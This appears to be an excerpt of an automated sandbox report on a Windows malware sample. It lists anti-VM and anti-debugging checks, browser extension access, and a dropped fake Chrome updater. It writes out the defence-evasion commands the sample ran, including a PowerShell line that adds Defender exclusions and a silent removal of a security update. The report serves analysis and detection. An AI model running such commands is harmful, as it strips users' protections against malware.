                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-104861
                    Source: C:\ProgramData\HIIDGCGCBF.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeSystem information queried: FirmwareTableInformation
                    Source: C:\ProgramData\HIIDGCGCBF.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\ProgramData\Google\Chrome\updater.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\ProgramData\Google\Chrome\updater.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\ProgramData\Google\Chrome\updater.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3401Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6403Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeDropped PE file which has not been started: C:\ProgramData\chrome.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496Thread sleep count: 3401 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496Thread sleep count: 6403 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3340Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DF10
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00418060 GetSystemInfo,wsprintfA,0_2_00418060
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: HIIDGCGCBF.exe, 00000004.00000002.1985668044.00000199B30FC000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000002A.00000002.2010174806.0000029CD506C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeAPI call chain: ExitProcess graph end nodegraph_0-104846
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeAPI call chain: ExitProcess graph end nodegraph_0-104849
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeAPI call chain: ExitProcess graph end nodegraph_0-104889
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeAPI call chain: ExitProcess graph end nodegraph_0-106024
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeAPI call chain: ExitProcess graph end nodegraph_0-104860
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeAPI call chain: ExitProcess graph end nodegraph_0-104868
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeAPI call chain: ExitProcess graph end nodegraph_0-104867
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeAPI call chain: ExitProcess graph end nodegraph_0-104688
                    Source: C:\ProgramData\HIIDGCGCBF.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\ProgramData\HIIDGCGCBF.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeThread information set: HideFromDebugger
                    Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: regmonclass
                    Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: procmon_window_class
                    Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: filemonclass
                    Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess queried: DebugPortJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess queried: DebugPortJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeProcess queried: DebugPort
                    Source: C:\ProgramData\Google\Chrome\updater.exeProcess queried: DebugPort
                    Source: C:\ProgramData\Google\Chrome\updater.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00404610 VirtualProtect ?,00000004,00000100,000000000_2_00404610
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040A090 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,0_2_0040A090
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h]0_2_00419AA0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,0_2_00405000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0041D21A SetUnhandledExceptionFilter,0_2_0041D21A
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B63A
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFF6ACC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CFF6ACC
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFF1726 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CFF1726
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFF11FD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CFF11FD
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_61EAF900
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: b4s45TboUL.exe PID: 6556, type: MEMORYSTR
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeNtQueryInformationProcess: Indirect: 0x7FF68D79249AJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeNtSetInformationThread: Indirect: 0x7FF68D76C6C7Jump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeNtQuerySystemInformation: Indirect: 0x7FF68D7339DAJump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeNtQueryInformationProcess: Indirect: 0x7FF7588EF327
                    Source: C:\ProgramData\Google\Chrome\updater.exeNtSetInformationThread: Indirect: 0x7FF7588DC6C7
                    Source: C:\ProgramData\Google\Chrome\updater.exeNtQueryInformationProcess: Indirect: 0x7FF75890249A
                    Source: C:\ProgramData\Google\Chrome\updater.exeNtQuerySystemInformation: Indirect: 0x7FF7588A39DA
                    Source: C:\ProgramData\HIIDGCGCBF.exeNtQueryInformationProcess: Indirect: 0x7FF68D77F327Jump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_004198E0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419790
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\HIIDGCGCBF.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\HIIDGCGCBF.exe "C:\ProgramData\HIIDGCGCBF.exe" Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6556 -ip 6556Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2568Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFBB5E0 cpuid 0_2_6CFBB5E0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417D20
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
